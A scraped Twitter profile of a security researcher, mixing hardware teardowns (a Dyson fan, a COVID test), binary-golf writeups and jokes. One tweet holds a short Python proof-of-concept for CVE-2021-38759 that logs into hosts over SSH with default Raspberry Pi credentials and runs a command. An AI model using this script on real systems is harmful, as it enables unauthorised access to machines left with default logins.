Battle Programmer Yuu

@netspooky

20,278 Followers
1,313 Following
2,462 Media
12,332 Statuses

knuck if you buck 日本語/español OK (he/they) @tmpout @binarygolf @netspooky @haunted .computer

Joined October 2017
Pinned Tweet
@netspooky
Battle Programmer Yuu
2 months
Here are the slides for my RECon 2024 talk "Binary Golfing UEFI Applications" !! Had a lot of fun, thanks for having me!
4
85
274
@netspooky
Battle Programmer Yuu
3 months
Have you ever wondered what's in one of those Dyson fans? Mine stopped working and I wanted to get rid of it, but I remembered it has my wifi creds and prolly customer info on the board, so it needs to be properly disposed of. Let's take it apart and see what's inside!
127
932
14K
@netspooky
Battle Programmer Yuu
3 months
$80 to smoke weed and write Python scripts?? I get paid way more to do that. Know your worth!! Don't let them lowball you!!
@Lord_Arse
Lord Arse! 🕹️
3 months
Like drugs? Enjoy programming? Boy, have I got the perfect job for you.
97
119
1K
24
602
8K
@netspooky
Battle Programmer Yuu
4 months
This is like the bong crafting of desoldering
42
734
4K
@netspooky
Battle Programmer Yuu
4 years
Watching Parler videos scraped by @donk_enby being used as evidence at the impeachment trial. The IDOR she found in Parler's API was one of the most consequential exploits in recent history.
16
327
2K
@netspooky
Battle Programmer Yuu
3 months
Also, why do I care about data on the device? If something collects data about me and it's in my control, why wouldn't I take a few minutes to disassemble it and learn about its internals? If I could wipe the disk on their servers that had my customer data I would do that too.
22
72
2K
@netspooky
Battle Programmer Yuu
5 years
@byourseff @__device__ "try with another browser"
4
17
2K
@netspooky
Battle Programmer Yuu
4 months
Idk if we can ever beat 2020 thugcrowd in the shitposting department
@thugcrowd
ThugCrowd
4 years
Checkmate libs.
14
54
510
9
95
2K
@netspooky
Battle Programmer Yuu
2 years
Tweet media one
10
196
2K
@netspooky
Battle Programmer Yuu
4 years
Now that he's in jail I can probably say, the highlight of my career is getting J\o\h\n M\c\A\f\e\e to sideload an APK on his trap phone while he was on the run.
22
185
2K
@netspooky
Battle Programmer Yuu
3 months
The first order of business is getting the screws off the bottom. There were screws in several locations, many under the feet. Once the bottom cover is off, you can see the gear mechanism that rotates the fan
6
15
2K
@netspooky
Battle Programmer Yuu
1 month
@MikaelThalen He fell for one of the classic blunders, thinking they can win a fight against gay furry hacktivists online.
12
50
2K
@netspooky
Battle Programmer Yuu
3 years
@prodilovechris How do you even have that many authors? Is everyone just contributing one word at a time? "Yo you heard that new 🔥🔥? Remember when they said 'the'? That was me bro!! I wrote that!"
4
14
1K
@netspooky
Battle Programmer Yuu
3 months
Also there are people in the quote tweets wondering why this fan even has wifi and stores data. This fan has an MQTT server on it that the app uses to control it. It also stores historical data about air quality, temperature, and other things. That's why I wanted to take it apart
11
16
1K
@netspooky
Battle Programmer Yuu
4 months
ok
8
80
1K
@netspooky
Battle Programmer Yuu
3 months
There are three main things in the base, a screen, a main board, and a wifi/BLE module. The main board is shiny due to resin coating.
4
10
1K
@netspooky
Battle Programmer Yuu
3 months
I realized the screws that held the other part of the base were screwed from the inside, so I took out the filter and removed the actual fan part out, revealing the electronics I'm looking for!
3
10
1K
@netspooky
Battle Programmer Yuu
2 years
'No Way To Prevent This,' Says Only CDN That Regularly Hosts Content Like This
6
263
1K
@netspooky
Battle Programmer Yuu
1 month
I Wake Up
7
135
1K
@netspooky
Battle Programmer Yuu
3 months
This is a closer pic of the wireless module. When I took this pic, my phone's camera read that barcode which said "QCA4020", which is a nice soc I've played with before. It's got WiFi, BLE, and even has 802.15.4 (hehe)
3
12
1K
@netspooky
Battle Programmer Yuu
3 months
This is the main board. It's glossed tf up with a resin coating. It's got an STM32F429 which is an ARM Cortex M4 chip. There's an unmarked chip covered in glue on the back side, which is close to where the power comes in so it's probably a power controller or something
7
7
1K
@netspooky
Battle Programmer Yuu
2 years
@oneunderscore__ @MattWBZ "I told my kids that dinosaurs didn't become extinct by accident, they saw the future and said "Screw this, let's go to the tarpit"" is the hardest thing I've ever heard anyone say about a grocery store closing.
5
54
1K
@netspooky
Battle Programmer Yuu
5 months
Just to be clear:
RTSP - Real Time Streaming Protocol
RTP - Real-time Transport Protocol
SRTP - Secure Real-time Transport Protocol
RSTP - Rapid Spanning Tree Protocol
RTPS - Real Time Publish Subscribe protocol
PSRT - Parsley, Sage, Rosemary and Thyme (Simon & Garfunkel album)
15
184
1K
@netspooky
Battle Programmer Yuu
3 years
I bought one of these today because I needed to take a test. It was the only one at CVS and it was disappointing because it required me to link with a phone to get my results. Let's see what's inside:
41
321
1K
@netspooky
Battle Programmer Yuu
4 years
22
266
1K
@netspooky
Battle Programmer Yuu
3 months
The remote was very annoying to take apart. It was glued in, so I had to carefully chip away at it with pliers. Notice the magnets on the side of the plastic, and the fact that there are 10 buttons while only 8 are used.
7
5
1K
@netspooky
Battle Programmer Yuu
3 months
I really wanted to get the fan blower apart, but after unscrewing and unclipping everything I could see, the unit seems to be snapped together in a way that I can't figure out at the moment. That's all for now, I gotta get back to work lol.
10
6
988
@netspooky
Battle Programmer Yuu
2 years
My dad visited me for the first time in nearly 5 years. I showed him my office, he sees my shelf full of computers. I pointed to one tower and said "That one is fuzzing the Linux kernel, it's looking for bugs 24/7" His response: "Ok."
19
29
953
@netspooky
Battle Programmer Yuu
5 years
@yogioabs How are there so many of these same dudes on Twitter? Do y'all have some starter pack with copypastas like a multi level marketing representative or something?
8
13
901
@netspooky
Battle Programmer Yuu
2 years
What's a handy reverse engineering trick that you think more people should know about?
81
201
942
@netspooky
Battle Programmer Yuu
3 months
Now for the long air circulator part. There is what I assume is an air quality sensor with an air intake. The rest of the unit doesn't have too much else in it. I know the top of the fan has a magnet for charging the remote, but I don't feel like disassembling.
6
4
937
@netspooky
Battle Programmer Yuu
10 months
Good news everyone, we are all keeping our jobs at the SQL injection factory
@AdamRackis
Adam Rackis
10 months
Server actions 🔥
786
309
4K
7
105
879
@netspooky
Battle Programmer Yuu
3 years
As a person in the know, it's good, actually, to gatekeep spyware from abusive partners. This is just vile.
35
95
851
@netspooky
Battle Programmer Yuu
2 years
This is one of the most in depth blog series I've ever read about networking on Linux. A bit old now but still 🔥 Everything from physical NIC registration to how data moves from userland<->kernel and beyond. Sending: Receiving:
7
197
848
@netspooky
Battle Programmer Yuu
5 years
@Crypto_Bitlord Not real. That's notpetya my dude. A lot of planes in flight systems like that use Linux. NotPetya targets Windows. Also this is the original pic.
21
72
802
@netspooky
Battle Programmer Yuu
3 years
tl;dr - You can rip the test strip out instead of giving your data to some dodgy company, and you get a BLE SoC to mess around with. Also I tested negative 🎉
12
34
794
@netspooky
Battle Programmer Yuu
1 year
Antennas will never not be funny to me. I got this satellite one that's just a little ceramic block attached to a wire. I know that so much math and engineering went into this, but the form factor is like ??? plug this bricklet into yr antenna hole and you can get data from space
11
94
773
@netspooky
Battle Programmer Yuu
3 months
For those wondering why I don't just fix it: The original issue was that the device didn't boot up. I think a firmware update got borked and bricked it. I spoke with @dnoiz1 who had the same issue. You would need to replace the main board which isn't an easy part to get.
12
8
784
@netspooky
Battle Programmer Yuu
2 months
I wish people would just post the link to stuff instead of treating everything like some ancient secret that you gotta click the Like and Subscribe button to unlock.
32
30
727
@netspooky
Battle Programmer Yuu
3 years
I remember when I was interviewing for my first tech job in early 2017. Someone asked me "What do you think the biggest cyber threat will be over the next 5 years?" I said "ransomware", and the dude argued with me about it and was oddly dismissive. I wonder how that org is doing.
17
52
682
@netspooky
Battle Programmer Yuu
3 years
My entry for #bggp2021 - 487 byte PE/PDF/JS polyglot Source:
16
118
674
@netspooky
Battle Programmer Yuu
4 years
Parler has hella vulns and leaks user data like crazy
29
79
648
@netspooky
Battle Programmer Yuu
3 years
you ever walk up to a cat and say %p%s%p%s%p%s%p%s
10
80
661
@netspooky
Battle Programmer Yuu
4 years
lmao
48
90
644
@netspooky
Battle Programmer Yuu
1 year
scare - Simple Configurable Assembly REPL && Emulator I wrote this for people who want to write/test/play with various assembly architectures on the command line. Currently supports x86, x64, arm32, arm64 with plans for more architectures and modes.
17
174
634
@netspooky
Battle Programmer Yuu
3 years
Thanks for showing me what it looks like, I will be sure to accidentally drop my entire coffee on it if I see one in public.
9
84
611
@netspooky
Battle Programmer Yuu
2 years
Bypassing DRM and evading paywalls are life skills that should be taught in school
8
111
605
@netspooky
Battle Programmer Yuu
2 years
Excited to be starting at one of the Big 5 Ransomware groups today! Thanks to everyone who supported me on this journey 🙏🙏
28
41
600
@netspooky
Battle Programmer Yuu
2 years
I was looking at some vuln code snippets for a thing I'm making and stumbled across this. At first I was like "do they mean extern? huh, are they making a symlink? wait, wut?". It didn't make any sense and I couldn't think of a reason why. Then I looked "printf external link" up.
12
111
601
@netspooky
Battle Programmer Yuu
5 years
I'm sitting on a rather large collection (~4GB) of modern malware sources. They are sorted by strain/version. Botnets, RATs, Trojans, Cred Stuffers, Rootkits, Phishing etc. Trying to figure out a sane way to make this available to researchers. If you are interested let me know.
161
106
585
@netspooky
Battle Programmer Yuu
3 years
what you're referring to as facebook is actually google plus facebook, or as i like to call it, an anti-trust violation
5
111
580
@netspooky
Battle Programmer Yuu
2 years
This is the CEO of Twitter. If you think this is cool or good in any way, we are not friends. I will not argue with you.
39
56
574
@netspooky
Battle Programmer Yuu
2 years
Is there any mobile game that isn't straight up spyware? I just looked at Tetris on Android. First off it's 136MB, which is outlandish considering I've seen Tetris that fits in a 512 byte boot sector. Second, the privacy policy outlines data it collects and stores indefinitely.
28
68
546
@netspooky
Battle Programmer Yuu
3 years
@LikeAndBlock There's no source for this at all. Blocking you so you can't hide my reply like all the others.
20
19
518
@netspooky
Battle Programmer Yuu
5 years
-At a game dev class- Instructor: So you work with computers already, what do you do? Me: I'm a reverse engineer. Instructor: So are you learning less? Me: Yes, soon I will know nothing.
9
76
548
@netspooky
Battle Programmer Yuu
1 month
Another banger from retr0id "Jailbreaking RabbitOS (The Hard Way)". It's got everything: secureboot bypasses, an Android bootkit, a tethered USB jailbreak over WebSerial, GPL violations, and highly questionable logging practices. A very fun read !!
3
173
565
@netspooky
Battle Programmer Yuu
2 years
I'm happy to finally share my writeup on weird things you can do with multicast protocols. Packets Remystified: Broadcast Brujería
14
135
512
@netspooky
Battle Programmer Yuu
6 years
PROTIP: You don't need an expensive setup to get into infosec & learning. Until last year, every machine I ever used was rescued from a dumpster. As long as you can send and receive packets, and have somewhere to edit and store files, you're good to go :)
15
106
504
@netspooky
Battle Programmer Yuu
2 years
@_nyancrimew Dan Bishop: "I'm coming for answers" The question: "Why are gay allowed in our servers when we already made it illegal for them to go to the bathroom?"
2
26
497
@netspooky
Battle Programmer Yuu
3 years
Remembering the wildest conversation I had IRL this year with a person who supposedly worked in IT and argued (among other things) that malware wasn't rly a threat anymore because computers are so fast now it doesn't matter. And you can just "get a new computer". Hope he's well.
33
23
482
@netspooky
Battle Programmer Yuu
1 year
I've been meaning to share this for a bit. Here is a wireshark/tshark dissector for the Apple BLE Advertising Beacon protocol known as "Continuity". It dissects all the data that your devices are sending out constantly. Happy Friday!
12
117
484
@netspooky
Battle Programmer Yuu
6 months
New blog! "BGGP4: A 420 Byte Self-Replicating UEFI App For x64" I cover UEFI, the UEFI x64 ABI, writing UEFI applications in x86_64 assembly, Tianocore EDK2 image loader internals, QEMU automation, and binary golf strategies for UEFI PEs. Happy Friday!
10
150
470
@netspooky
Battle Programmer Yuu
3 years
hackers will either set up something super vulnerable and fragile that was supposed to be temporary but falls into regular use, or make something so secure that they eventually cannot get back into it after forgetting about it for 6 months
7
49
462
@netspooky
Battle Programmer Yuu
3 years
PoC||GTFO 21 is out!! Check out my paper on creating a tiny palindrome 64 bit ELF, as well as all the other badass papers and hidden secrets in this PDF :)
10
156
463
@netspooky
Battle Programmer Yuu
3 years
Binary Golf Grand Prix 2021 is now live! curl -sL n0[.]lol/bggp/2021.ans
5
120
452
@netspooky
Battle Programmer Yuu
1 year
Clicked on the link in this CVE's references section and found that it's just a GitHub issue that was closed because the OP misinterpreted some files and thought it was a bug 😵‍💫
@CVEnew
CVE
1 year
CVE-2023-34585 An issue was discovered in OBS-Studio 29.1.1, plaintext storage of passwords.
3
4
17
14
72
451
@netspooky
Battle Programmer Yuu
4 months
Tweet media one
3
19
457
@netspooky
Battle Programmer Yuu
3 years
I think that knowing how to read C is one of the most crucial skills for security people. You don't even have to be good at writing it. Just knowing how programs are structured, common standard library functions, and how to roughly follow the program flow, will pay dividends.
18
62
428
@netspooky
Battle Programmer Yuu
4 years
I love that MSNBC showed the faces of each senator as they voted "Not Guilty". Remember their coward ass faces.
10
71
409
@netspooky
Battle Programmer Yuu
3 years
If your man: ✅ Is overprotective ✅ Is controlling ✅ Has an extensive earth-fault protection portfolio with unique multi-frequency admittance-based protection for higher sensitivity and selectivity That's not your man, that's an ABB HBFHAEAGNBA1BNN11G
8
92
414
@netspooky
Battle Programmer Yuu
3 years
On the plus side, you do get a nice Nordic Semiconductor nRF52810 and test pads to reprogram it if you want to play around with BLE. It's got an ARM Cortex M4 and a 2.4 GHz transceiver. It's a shame it's meant to be thrown away, you can have a lot of fun with this.
7
38
415
@netspooky
Battle Programmer Yuu
2 years
If I went to an interview and they gave me 30 minutes to solve a problem like this, I'd spend that 30 minutes looking for other jobs to apply to haha.
32
31
401
@netspooky
Battle Programmer Yuu
3 years
82 byte ELF64 - 2 bytes smaller than what was thought to be the smallest possible. Bypasses the kernel mitigation that made 84 byte ELF64s not work anymore. :)
6
66
403
@netspooky
Battle Programmer Yuu
4 years
Here is my write up on creating a palindromic 64 bit ELF binary for the Binary Golf Grand Prix. This 245 byte ELF binary executes the same forwards as it does backwards, and prints out the palindrome "Puppy Spy, Psy P. Pup".
5
140
398
@netspooky
Battle Programmer Yuu
2 years
RE Tips: Common String Representations Strings are a good way of determining the layout of an unknown binary blob. If you can figure out how the strings are stored, you can use it as an anchor to map out other structures around them.
4
68
399
@netspooky
Battle Programmer Yuu
2 years
dst2dst, a multicast chat protocol tunneled over any ethernet frame and bounced off the router
10
66
390
@netspooky
Battle Programmer Yuu
3 years
I found my first legit kernel bug in the latest kernel, triaged it, wrote a poc to test, showed some pals for their thoughts. Both send me blog posts about how just 3 days ago this bug was found, exploited, and patched.
21
12
388
@netspooky
Battle Programmer Yuu
2 years
Found a notebook from when I truly went insane and started to learn x86 from the bottom up
21
25
390
@netspooky
Battle Programmer Yuu
8 months
sorry can't go out i got a uart shell on my mf shoes
5
36
371
@netspooky
Battle Programmer Yuu
3 years
Me explaining CSRF, the underground cookie market, and browser exploits at the family gathering
9
46
363
@netspooky
Battle Programmer Yuu
4 years
Here is my writeup called "Modern PE Mangling". I discuss the limits of modern 64 bit Windows binaries, and launch calc.exe from a 268 byte executable.
@netspooky
Battle Programmer Yuu
4 years
Bang bang
2
2
45
9
135
370
@netspooky
Battle Programmer Yuu
3 years
1 K too many if u ask me
7
37
366
@netspooky
Battle Programmer Yuu
3 months
@DigiDevZak Take apart something you enjoy using and see how it works. Start small and look up everything you see. If you are used to software, think about how physical components would fit together like libraries. What need does each module address? How do they interface with each other?
1
18
370
@netspooky
Battle Programmer Yuu
2 years
Going through notes, this is a mockup for a plugin I started to write to dump kernel structures and make them look pretty. I probably won't finish it so here.
15
35
368
@netspooky
Battle Programmer Yuu
2 years
Finding kernel bugs is more lucrative than mining crypto, so if you're looking for an alternative to heating your office, def explore this route.
9
37
346
@netspooky
Battle Programmer Yuu
3 months
@metaltxt I saw this dude outside of Nakano station several times, legend with the Pulse Demon shirt
1
0
351
@netspooky
Battle Programmer Yuu
3 years
How many likes do we need to get the cool S added to Unicode? @unicode
@David3141593
David Buchanan
3 years
@netspooky Come to think of it, the cool S should totally be added to @unicode
0
0
35
6
60
341
@netspooky
Battle Programmer Yuu
9 months
They say my code is exceptional, on account of how many exceptions it throws
4
57
347
@netspooky
Battle Programmer Yuu
4 years
Are you taking full advantage of Python 3? Are you sure?
10
44
340
@netspooky
Battle Programmer Yuu
3 years
For every unashamedly shitty person in InfoSec, there are two people with equal or greater skill who are uncomfortable participating in this industry because of them.
11
54
332
@netspooky
Battle Programmer Yuu
2 years
Exploit writing in the future will be like: exploit, aarch64, 128 bytes, no nulls, large breasts, trending on exploit-db, encode as emojis, reverse shell, format string leak, stageless, userfaultfd handler, massive breasts, use io_uring_spawn
8
38
331
@netspooky
Battle Programmer Yuu
3 years
#POC - CVE-2021-38759 - Tested on latest
import paramiko
import sys
h=sys.argv[1]
u="pi"
p="raspberry"
c=paramiko.client.SSHClient()
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(h,username=u,password=p)
i,o,e=c.exec_command("id")
print(o.read())
c.close()
26
72
328
@netspooky
Battle Programmer Yuu
3 years
The BGGP 2021 Polyglot File Challenge repo is here! Each entry has been scored and visually dissected. Included are the files and info on how to run them yourself!
5
104
326
@netspooky
Battle Programmer Yuu
3 years
@fsf While our primary mission is freedom for software users, we want to be clear, the FSF board unanimously condemns misogyny, racism, and other bigotry as well as defamation, intimidation, and unfair attacks on free thought and speech.
3
35
320
@netspooky
Battle Programmer Yuu
4 years
I wrote a small script to do some basic differential analysis on network protocols. It's helped me understand some unknown protocols, so I figured I'd share. It's built for analyzing TCP/UDP based protocols, but it uses scapy, so there's room to grow!
5
91
321
@netspooky
Battle Programmer Yuu
2 years
@corg_e "My boss needs it"
0
1
316
@netspooky
Battle Programmer Yuu
3 years
Microsoft in talks to acquire popular malware hosting platform Discord for over $10B
12
51
318
@netspooky
Battle Programmer Yuu
2 years
After some digging I found this: If you mouse over printf here, it says "external link". This means someone somewhere copy/pasted this code incorrectly and it was passed along through various blogs and trainings for years. Cool?
6
22
316
@netspooky
Battle Programmer Yuu
4 years
6
106
314
@netspooky
Battle Programmer Yuu
2 years
PoC for full duplex null frame reverse shell. It communicates over multicast and uses just one byte in the eth.dst field for channel negotiation. The rest of the bytes are just \x00. The lag is due to some socket timeout drama. Writeup on this + other multicast fun soon.
11
64
309
@netspooky
Battle Programmer Yuu
2 years
It's incredible how quickly everyone can figure out how to completely derail and defeat an AI.
4
45
307